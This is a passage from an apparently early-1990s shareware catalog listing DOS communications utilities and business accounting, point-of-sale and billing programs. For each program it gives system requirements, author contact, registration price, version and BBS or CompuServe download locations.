File transfer utility PC <-> Model 100. See full description + on page 168. + + Chapter 7, "Communications" 168 + + + + 7.7 File transfer protocols + + Product: COM-AND + Communications and Accessories. See full description on + page 161. + + Product: PCM100.COM + Needs: IBM PC, DOS 2.1 or better. Serial Port (COM1/COM2), null + modem cable, TRS-80 Model 100/200. + Author: Yves Charier, 331-4340-3743 + Registration: $25.00 + Version: 1.01 (08-25-91) + User benefits: Technical support, source code. + Look for: availability unknown on BBSs; PCM100.ZIP in IBMCOM + forum LIB 3 on CompuServe. + Download size: 28k + Description: + A communications program allowing text files exchanges between + a TRS-80 Model 100 hand-held computer (or compatible) and any + PC-XT (or close compatible, like the Tandy 1000 PC) via the + serial port (RS-232C) and a null-modem adapter. Most of upper + ASCII characters are automatically translated as well during + downloading as well as uploading. + + + 7.8 Fax software + + Product: Total Control + Needs: IBM PC, DOS 3.0 or better. Hayes compatible modem. + Author: Unique Software + Registration: $24.95 + Version: 2.005 (11-15-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; user support by Fax and CompuServe Mail. + Look for: TOTLCTL.EXE on BBSs; TTLCTL.EXE in IBMCOM forum LIB 3 + on CompuServe. + Download size: 108k + Description: + Take total control of your phone line! + * Use your computer with a voice line and/or an answering + machine and/or a fax machine. + * Upgrade your answering machine! + * Monitor your incoming calls and their length! + * Program to NOTIFY you of arrivals of messages, fax's or + computer mail. + * Notification by pocket pager -OR- telephone. + * Use with COM1 - COM4. + * Easy to install with TINSTALL! + * Self Extracting Archive. + + Chapter 7, "Communications" 169 + + + + 7.9 Terminal emulators + + Product: COM-AND + Communications and Accessories. See full description on + page 161. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 62. + + + 7.10 Communication utilities + + Product: COM-AND + Communications and Accessories. See full description on + page 161. + + Product: Total Control + Modem, Ans Mach, Fax on one telephone line. See full + description on page 168. + + Product: XRS ("eXpress Response System") + Needs: IBM PC, DOS 3.1 or better. 320k RAM. + Author: Smokin' Software, 803-928-3332 + Registration: $30.00 + Version: 4.50 (07-21-91) + User benefits: Registered for all future versions. Can beta-test + new versions before public release. + Look for: XRS45*.ZIP (multiple files) on BBSs (call 803-556-7485 + to download it at no charge); XRS45?.ZIP in IBMBBS forum LIB 2 + (multiple files) on CompuServe. + Download size: 600k + Description: + This is a universal offline reader editor for most bulletin + board systems, including Fidonet style and QWK format mail. + Allows users to quickly select, compress and download mail for + offline reading, freeing up the bulletin board for more calls + more often, and saving on long-distance or metered phone + charges for the users. New installation program to + automatically configure the program. (English, Dutch, Swedish, + German and French) + + + 7.11 Software tools + + 7.11.1 For multiple programs + + Product: Serial++ Asynch Comm Library + Asynch comm support library for Borland C++. See full + description on page 268. + + Chapter 7, "Communications" 170 + + + + 7.11.2 For TAPCIS + + Product: CatScan + Needs: IBM PC, DOS 2.0 or better. 200k RAM. TAPCIS and hard + disk recommended. + Author: Rochester Heritage + Registration: $30.00 + Version: 3.0 (06-15-91) + User benefits: Disk and manual. Upgrades are free for the + download! + Look for: availability unknown on BBSs; CATSCN.EXE in TAPCIS + forum LIB 2 on CompuServe. + Download size: 130k + Description: + This TAPCIS add-on program provides several ways to maintain + your CompuServe data library catalogs. You can: + * Compresses catalogs up to 45% + * View catalogs and perform intricate searches + * Generates TAPCIS scripts to update catalogs and download + files + * Automatically delete duplicate file descriptions + * Sort on up to four fields + * Age descriptions to another file + All of this can be done either interactively or from the DOS + command line. + + Product: Recon(tm) + Needs: IBM PC, DOS 2.0 or better. TAPCIS. + Author: Amdox Co. Ltd. + Registration: $36.00 + Version: 2.01 (06-18-91) + User benefits: CompuServe online support, printed manual, latest + technical release, free standalone bonus utilities. + Look for: CHANNEL1 on BBSs (call 617-354-5776 to download it at + no charge); RECON*.* in TAPCIS forum LIB 2 (multiple files) on + CompuServe. + Download size: 290k + Description: + CompuServe/TAPCIS Message file manager, with message/reply + editor & script generator, pulldown menus & command line mode. + Handles forum messages, CMail & INTERNET. Keeps files trimed + and sorted into context, now with forum specific settings. Menu + SHELL organizes TAPCIS & add-ons. Sysop commands, changes + immediately reflected in file. Powerful file navigation & + viewing, multiple sorts, duplicate deletion, filters, search, + print, edit, delete, move or auto-age messages. Context + sensitive help. + + 7.11.3 For Wildcat! + + Product: EZ-Reader + Offline mail reader for PCBoard & Wildcat! See full + description on page 161. + + Chapter 7, "Communications" 171 + + + + Product: EZ-Reader + Mail manager for BBSes, MCI Mail, Compuserve. See full + description on page 161. + + 7.11.4 For PCBoard + + Product: EZ-Reader + Offline mail reader for PCBoard & Wildcat! See full + description on page 161. + + 7.11.5 For Qmodem + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 166. + + 7.11.6 For other + + Product: ACCU BBS Lister + WWIV On-line program to determine local BBSs. See full + description on page 165. + + + 7.12 Other + + Product: CNC-Transedit + A CNC Transfer/File manager/Editor/Math prog. See full + description on page 251. + + Product: See Mail [***] + E-mail facility, combines MCI with LAN e-mail. See full + description on page 164. + + Product: TransferTIME (TTIME) + Needs: IBM PC, DOS 3.1 or better. + Author: RGH Software, 616-832-4694 + Registration: $10.00 + Version: 2.0 (09-01-91) + User benefits: Free upgrades, CompuServe/BBS support. + Look for: TTIME20.ZIP on BBSs (call 616-768-8761 to download it + at no charge); TTME20.ZIP in IBMCOM forum LIB 2 on CompuServe. + Download size: 136k + Description: + Estimates the time and cost to transfer a file by modem, at + modem speeds of 1200, 2400 and 9600 bps, using the XMODEM, + YMODEM, ZMODEM and CompuServe B+ file transfer protocols. + + Estimates are obtained by giving a file name (for files being + sent from your system) or a file size (for files being sent to + your system). The program can operate in either a prompted + mode, or a command line mode. + + The cost estimate feature is fully customizable and the program + to change costs is included. + + Chapter 8, "Business" 172 + + + + + + Chapter 8 + Business + + See also: Writing applications, Document boilerplates, Business + specific (page 130); Spreadsheet applications (page 135); + Database applications, Mailing label systems (page 142); Data + (page 158); Communications, Call logging & analysis software + (page 165); Finances (page 215); Graphics, Business + applications (page 310). + + + 8.1 Business finances + + See also: Finances, Personal finances (page 218). + + Product: AMORTZ + The EASY Way to Loan Calculations. See full description on + page 218. + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 351. + + Product: DAYO GENERAL LEDGER (GL) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records & Accounts, Manual + (printed & disk), Phone Support. + Look for: DAYOGE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOGE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe. + Download size: 330k + Description: + Provides a means to manage and report company finances. Totally + integrated with the other DAYO packages. Features include + computer generated posting, multiuser, double entry, export + data, 30+ reports, budget management and unlimited accounts. + + Product: Loan Amortization + Loan Calculation and Comparison. See full description on + page 224. + + Chapter 8, "Business" 173 + + + + 8.1.1 Business accounting + + Product: C.A.R.S. [***] + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Cybernetic Software, 708-677-8358 + Registration: $49.00 + Version: 2.8 (03-27-92) + User benefits: Printed manual, master disks, 800# phone support, + one free upgrade. + Look for: CARS28.ZIP on BBSs (call 312-764-0591 to download it at + no charge); CARS28.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 117k + Description: + Helps organize all of your vehicle expenses. It will track and + report expenses over 26 user definable categories. Version 2.8 + keeps track of distance in miles or kilometers and fuel + consumption in gallons or liters, providing conversions when + necessary. It also logs business and personal trips. Reports + can be generated for any period of months, provideing totals + for tax or accounting purposes. The program will track any + number of vehicles, making it great for company fleets or + multi-car families. + + Product: DAYO ACCOUNTS PAYABLE (AP) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOVE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOVE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe; DAYOVE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + The 'final chapter' to the processing and maintenance of all + your Payables. Its key mission is to process/post your purchase + orders, however, many other routines have been provided, ie: + Expense Maintenance, 1099 MISC Forms, Purchase Clearing, Vendor + Maintenance, Hand/Manual Checks, Batch Checks, Recurring + Checks, Unlimited Bank Accounts, Unlimited Check Printing + Formats and many reports. + + Chapter 8, "Business" 174 + + + + Product: DAYO TIME & BILLING + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $95.00 + Version: 3.0 (06-24-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOTE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOTE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe; DAYOTE.ZIP in IBM RTC LIB 3 on + GEnie. + Download size: 340k + Description: + Comprises a system of creating invoices for services and/or + products. It has support for an inventory, receivables, + projects and customers/clients. Other features include: + multiuser, unlimited records, project notes, customer notes, + 30+ reports, onscreen viewing of reports, databases are dBase + (tm) compatible, laser formats for invoices and statements, 2 + styles of statements/bills, printer setup & drivers and cash + drawers drivers. + + Product: EASY BANKING [***] + Business or Personal Banking Information Mgr. See full + description on page 221. + + Product: EliteCheck + Extremely easy checkbook/budget management. See full + description on page 228. + + Product: Money Smith + Home Accounting Package for Windows 3.0. See full description + on page 224. + + Product: Painless Accounting + Needs: IBM PC, DOS 2.1 or better. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $125.00 + Version: 5.41 (06-18-91) + User benefits: Latest copy of the software along with a 150 page + printed manual in a 3 ring binder. Also receive major discounts + on updates. + Look for: PAC5*.ARC (multiple files) on BBSs (call 214-596-9164 + to download it at no charge); PAC5*.ARC in IBMAPP forum LIB 5 + (multiple files) on CompuServe; PAC5*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 600k + Description: + A full feature 11 module accounting system. Modules include: + General Ledger, Billing, Accounts Receivable, Accounts Payable, + Purchases, File Maintenance, Reports, Closing, Beginning + Balance Setup, and Utilities. Program is fully network + compatible, includes the ability to create user defined + Invoice, Statements, Purhcase Order, Received PO, and Check + + Chapter 8, "Business" 175 + + + + printing formats. Job Costing, 5 levels of Password protection, + Context sensitive help, and much much more!! + + Product: Painless Acct/Payroll Companion + Needs: IBM PC, DOS 2.1 or better. Painless Accounting or + Painless Payroll software. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $45.00 + Version: 5.0 (06-04-91) + User benefits: Latest copy of the software along with a printed + manual. Also receive major discounts on updates. + Look for: PAG.ARC on BBSs (call 214-881-0313 to download it at no + charge); PAG.ARC in IBMAPP forum LIB 5 on CompuServe; PAG.ARC + in IBM RTC LIB 3 on GEnie. + Download size: 200k + Description: + A custom graph, report, export generating program designed to + be use with Painless Accounting or Painless Payroll. The + modules include: Graphs, Reports, Exports, and Utilities. You + can create upto six different types of graphs including bar and + pie charts. You can also create custom line reports, group on + fields and subtotaling and totaling based on these fields. The + Companion also allows for exporting data files into ASCII + format. + + Product: PC-AP Accounts Payable + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Version: 1.6 (01-01-92) + User benefits: Phone support, bonus utilities. 20% discount on + first check order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple accounts payable program integrated with PC-GL. + Allows you to quickly enter vendors, enter invoices, choose + invoice for payment and print checks. Reports include check + listing, invoice listing, vendor listing, vendor activity + report and mailing labels. Allows up to 2000 vendors and 2000 + invoices/checks per month. Invoices and checks may be sorted + by any field. Maintains check book balance and posts checks to + PC-GL each month. + + Product: PC-AR Accounts Receivable + Accounts Receivable. See full description on page 187. + + Chapter 8, "Business" 176 + + + + Product: PC-DEAL + Needs: IBM PC, DOS 2.0 or better. + Author: KINDRED SPIRITS + Registration: $40.00 + Version: 2.45 (06-15-91) + User benefits: Latest version, no registration reminder screens, + notice of updates. + Look for: PCDEAL.* on BBSs (call 715-435-3855 to download it at + no charge); PCDEAL.EXE in IBMAPP forum LIB 5 on CompuServe. + Download size: 160k + Description: + Intended for personal accounting and bookkeeping for a small + organization or business. It combines both simplicity and + vesitility and is designed for those who have relatively + simple bookkeeping and accounting needs. It is ideal for those + with a need to take entries from a check register and quickly + and easily generate reports which summarize income and expense, + budget comparison, or financial condition. Transactions may be + freely entered over up to twelve months. + + Product: PC-FOOD + Needs: IBM PC, DOS 2.1 or better. + Author: Schreck Software, 612-731-6822 + Registration: $49.00 + Version: 5.2 (09-08-91) + User benefits: Next significant update free, subsequent updates + for only $10.00, support through CIS or by telephone. + Look for: PCFOOD.ZIP on BBSs; PCFOOD.ZIP in IBMAPP forum LIB 15 + on CompuServe. + Download size: 158k + Description: + Calculates and maintains required selling prices for each menu + item based on a desired gross profit percentage and or dollar + amount. Edit portion sizes and ingredient costs and see the + effect on costs and margins. User definable ingredient + classifications such as "fresh", "frozen", "dairy", etc. User + definable menu item classifications such as "breakfast", + "lunch", "beverage", etc. Print several reports including + "Required Price Changes", "Batch Recipes", "Menu Items", and + more. + + Chapter 8, "Business" 177 + + + + Product: PC-GL General Ledger + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Version: 3.6 (01-01-92) + User benefits: Phone support, bonus utilities. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Description: + A fast, simple general ledger program. It includes an easily + modified standard chart of accounts. The program prints an + income statement with current, year to date and prior year + percents and a three column balance sheet. Other reports + include a general ledger for current and year to date and a + number of different transaction listings. Each entry is + instantly verified. Allows up to 800 items in the chart of + accounts and up to 6000 transactions per month. + + Product: PC-PR Payroll Writing + Payroll writing. See full description on page 191. + + Product: PCINV Invoice Writing + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Version: 1.1 (01-01-92) + User benefits: Phone support, bonus utilities. 20% discount on + first forms order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Description: + A fast, simple invoice writing program integrated with the PC- + AR Accounts Receivable program. Enter up to 50 lines of 42 + character invoice detail. Calculates sales tax on taxable + items. Allows multiple line descriptions which can include + costs times amount. Prints on 7 inch or 11 inch preprinted + forms or plain paper. Prints invoices as you enter them and + does not allow for batch printing or editing previous invoices. + Invoices are immediately posted to PC-AR. + + Chapter 8, "Business" 178 + + + + Product: Rosewood Journal + Needs: IBM PC, DOS 2.0 or better. Printer. + Author: Rosewood Software, 416-284-6119 + Registration: $38.00 + Version: 4.12 (01-27-92) + User benefits: Latest version is sent along with a file to remove + registration exhortations. + Look for: ROSEJ412.ZIP on BBSs; RJ412.ZIP in IBMAPP forum LIB 6 + on CompuServe. + Download size: 166k + Description: + Rosewood Journal is an Invoice Journal and complete Accounts + Receivable package written specifically for small to medium + size businesses. Journal allows easy entry of invoice data + because of its intuitive input and automatic account search. It + will generate monthly and yearly reports and aged accounts + receivable lists and statements ready for window envelopes. Up + to 2 levels of sales tax. A label maker is built in. There are + many other features designed to make sales accounting easy. + + Product: Takin' Care of Business! AP + Needs: IBM PC, DOS 2.0 or better. 640k RAM. Hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $149.95 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, import/export, merge, mouse support and + automated year-end closing. + Look for: availability unknown on BBSs; TCB-AP.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 225k + Description: + This Accounts Payable module fully integrates with other Takin' + Care of Business! modules but needs at least the files TCB.ZIP + and TCB-GL.ZIP to run. Some features include: context sensitive + help, 2000 vendors, unlimited transactions, manual/computer + printed checks, discounts, partial payments, pre/post dated + transactions, many payment options, address labels and a full + range of reports. This is one of the easiest-to-use, error-free + ways of tracking and paying your invoices. + + Chapter 8, "Business" 179 + + + + Product: Takin' Care of Business! AR + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $149.95 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, import/export, merge, mouse support and + automated year-end closing. + Look for: availability unknown on BBSs; TCB-AR.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 205k + Description: + This Accounts Receivable module fully integrates with other + Takin' Care of Business! modules but needs at least the files + TCB.ZIP and TCB-GL.ZIP to run. Some features include: context + sensitive help, 2000 customers, unlimited transactions, + Invoices, Statements, pre-printed or plain-paper forms, finance + charges, pre/post dated transactions, address labels and a full + range of reports. This is one of the easiest-to-use, error- + free ways to help track your customer receivables. + + Product: Takin' Care of Business! GL + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. File + TCB.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $69.95 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, graphics, import/export, merge, mouse + support and automated year-end closing. + Look for: availability unknown on BBSs; TCB-GL.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 190k + Description: + This General Ledger module is fully integrated with other + Takin' Care of Business! modules but needs at least the file + TCB.ZIP to run. Some features include: context sensitive help, + real-time accounting, 2000 accounts, unlimited transactions, + full range of accountant-ready reports, budgets, double entry, + pop-up windows, recurring transactions, passwords, pre/post + dated transactions and check writing using any check. + Professional accounting software for non-accountants. + + Chapter 8, "Business" 180 + + + + Product: Takin' Care of Business! IN + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $299.95 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, mouse support and automated year-end + closing. + Look for: availability unknown on BBSs; TCB-IN.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 165k + Description: + This Inventory module fully integrates with other Takin' Care + of Business! modules but needs at least the files TCB.ZIP and + TCB-GL.ZIP to run. Some features include: context sensitive + help, 3000 items, unlimited transactions, services or products, + FIFO, LIFO, standard cost, specific cost, physical inventory + and a full range of reports including activity and re-order + reports. Very easy to use and is one of the easiest ways to + track your inventory. + + Product: Takin' Care of Business! M&C + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. File + TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $69.95 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, graphics, import/export, merge, mouse + support, automated year-end closing and two bonus software + utilities. + Look for: availability unknown on BBSs; TCB.ZIP in PCVENC forum + LIB 5 (multiple files) on CompuServe. + Download size: 305k + Description: + A fully integrated, eight-module, double-entry accounting + system designed for small/medium sized businesses. Some + features include pop-up windows, menu driven, context sensitive + help, passwords, full-range of accountant-ready reports and + pre/post dated transactions. Combines the power & + sophistication of "Big Business" bookkeeping with a simple, + easy-to-use, full-featured design. + + Chapter 8, "Business" 181 + + + + Product: Takin' Care of Business! PR + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $139.90 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, export, mouse support and automated + year-end closing. + Look for: availability unknown on BBSs; TCB-PR.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 255k + Description: + This Payroll module fully integrates with other Takin' Care of + Business! modules but needs at least the files TCB.ZIP and TCB- + GL.ZIP to run. Some features include: context sensitive help, + auto deduction/liability calculations, override options, + manual/computer checks, 401K plans, user-modifiable tax tables, + W-2s, 1099s, hourly/salary, weekly/biweekly/semi-monthly/ + monthly periods and a full range of reports. One of the + easiest-to-use and complete payroll programs available. + + Product: Takin' Care of Business! PS + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $299.95 + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, mouse support and automated year-end + closing. + Look for: availability unknown on BBSs; TCB-PS.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 155k + Description: + This Point Of Sale module fully integrates with other Takin' + Care of Business! modules but needs at least the files TCB.ZIP + and TCB-GL.ZIP to run. Some features include: context + sensitive help, product & service invoices, pre-printed or + plain-paper forms, pop-up account windows, pre-defined service + descriptions and multiple pricing. Integrates with the + Inventory, A/R and G/L modules (TCB-IN.ZIP, TCB-AR.ZIP and TCB- + GL.ZIP). Very easy to use. + + Product: Time is Money + A time and expense billing program. See full description on + page 189. + + Chapter 8, "Business" 182 + + + + Product: XPENS + Needs: IBM PC, DOS 2.0 or better. Epson or HP LaserJet printer. + Author: Richard A. Williams, 815-455-6333 + Registration: $29.00 + Version: 1.1 (01-10-92) + User benefits: Printed manual, master disks. + Look for: availability unknown on BBSs; XPENS1.ZIP in IBMAPP + forum LIB 5 on CompuServe; XPENS.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 47k + Description: + Designed to provide employers and employees with a quick, easy + to use expense account screen/report that will eliminate the + necessity of keeping a supply of expense report forms and doing + all the arithmetic involved in preparing the report. Because + reports are stored on disk, the employee copy of the report + becomes unnecessary. + + 8.1.2 Point-of-sale systems + + Product: DAYO BACK ORDERS (BO) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Version: 2.0 (04-01-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOOE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOOE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOOE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 310k + Description: + The maintenance module for the processing of all your + customers/sales backorders. Working with DAYO POS, it + determines and manages the filling (allocation) of your + customers backorders. It does this through an allocation + process that determines what backordered items are 'fillable' + because of receipts into the inventory. Creates the same type + invoices as DAYO POS. + + Product: DAYO INVENTORY + Inventory Control and Purchase Orders. See full description on + page 193. + + Chapter 8, "Business" 183 + + + + Product: DAYO LITTLE POS + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOPS.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 250k + Description: + A modified version of DAYO POS create to reduce memory + requirement. Useful on LANs and/or networks where memory is + usually at a premium. + + Product: DAYO ORDER ENTRY + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Version: 3.0 (06-12-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOZE.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 300k + Description: + Creates sales orders based on the DAYO Inventory, Customer, and + other DAYO databases. Orders can be printed on a standard + printer or a Hewlett Packard(tm) Laserjet compatible printer. + The order can be printed on a pre-printed form, on the Laser + printer in a special laser format, or as a standard/default + form. + + Product: DAYO POS (POINT OF SALE) + Needs: IBM PC, DOS 3.3 or better. 530K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Version: 3.1 (06-28-91) + User benefits: Multiuser, Unlimited records, Manual (printed & + disk), Phone Support. + Look for: DAYOPE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOPE.ZIP in IBMAPP forum LIB 6 + (multiple files) on CompuServe; DAYOPE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + A Billing and Invoicing application for any size business. It + is the DAYO module that permits you to invoice out your + products while keeping an accurate record of all your 'sales'. + Features include: Multiuser (ie: Novell), Registers, Quote + Interface, Templates, Back Orders, Cash Drawers, Packing/ + Shipping Lists, Labels, Sales Graphs, Special Pricing, Tax + Codes, Terms Codes, Credit Limits, Passwords, MRP interface, + Multiple Prices, and many Reports. + + Chapter 8, "Business" 184 + + + + Product: DAYO PRICE BOOK + DAYO Special Pricing, Price Books & Lists. See full + description on page 208. + + Product: DAYO QUOTES + Needs: IBM PC, DOS 3.3 or better. 530K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $50.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOQE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOQE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOQE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 310k + Description: + Creates sales order quotes based on the DAYO Inventory, + Customer, and other DAYO databases. Quotes can be printed on a + standard printer or a Hewlett Packard (tm) Laserjet compatible + printer. The quote can be printed on a pre-printed form, on the + Laser printer in a special laser format, or as a standard/ + default form. DAYO Quotes is totally integrated with the DAYO + POS and/or Billing & Invoicing modules. Templates (kits or + bundles), are supported. + + Product: DAYO RENTAL POS + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Version: 3.0 (06-26-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOPR.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 300k + Description: + A Billing and Invoicing application for any business that rents + items, equipment, or services, ie: Videos, Tapes, Furniture, + Tools, Appliances, etc. This program requires the regular DAYO + POS module for its reports and configuration settings. It is by + default a multiuser system, allowing almost unlimited numbers + of users to have the ability to simultaneously invoice using + this one program on a PC based LAN/Network. + + Chapter 8, "Business" 185 + + + + Product: DAYO RETURNS & REFUNDS + Needs: IBM PC, DOS 3.3 or better. 450K RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Version: 2.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOP2.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 280k + Description: + A modified version of DAYO POS, but contains only the + capability of doing returns and/or refunds of invoices/items. + The invoices default to type 'Ret' (Returns of merchandise), + and are posted as negative amount (later to become Credit + Memos). + + Product: DAYO SIMPLE POS + Needs: IBM PC, DOS 3.3 or better. 520K RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Version: 2.0 (06-01-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOP1.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 310k + Description: + A a modified version of DAYO POS that was created to exclude + the option of selecting a customer. This program is used on + CASH accounts only. Useful in grocery store type environments + (where no customer name is required). + + Product: Painless Accounting + Full feature 11 module accounting system! See full description + on page 174. + + Product: PCINV Invoice Writing + Invoice writing. See full description on page 177. + + Product: Takin' Care of Business! AP + TCB Accounts Payable program. See full description on + page 178. + + Product: Takin' Care of Business! AR + TCB Accounts Receivable program. See full description on + page 178. + + Product: Takin' Care of Business! GL + TCB General Ledger program. See full description on page 179. + + Product: Takin' Care of Business! IN + TCB Inventory program. See full description on page 179. + + Chapter 8, "Business" 186 + + + + Product: Takin' Care of Business! M&C + TCB Main and Configuration programs. See full description on + page 180. + + Product: Takin' Care of Business! PR + TCB Payroll program. See full description on page 180. + + Product: Takin' Care of Business! PS + TCB Point Of Sale program. See full description on page 181. + + 8.1.3 Billing systems + + Product: DAYO ACCOUNTS RECEIVABLE (AR) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $65.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manuals (printed & + disk), Phone Support. + Look for: DAYOAE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOAE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe; DAYOAE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + The 'final chapter' to the processing and maintenance of all + your Receivables. Includes routines to handle cash receipts, + customers, invoice types, terms, taxcodes, sales persons, and + more. Many reports are included (ie: Ageing, Customer, Sales... + ). There is a routine to print Statements (ie: SMART, 90, 60, + 30 days), and another one to create and print 'non' standard + invoices (not applicable to DAYO POS). HP Laser forms are + provided as an option for Statements and Invoices. + + Product: DAYO BILLING & INVOICING + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, 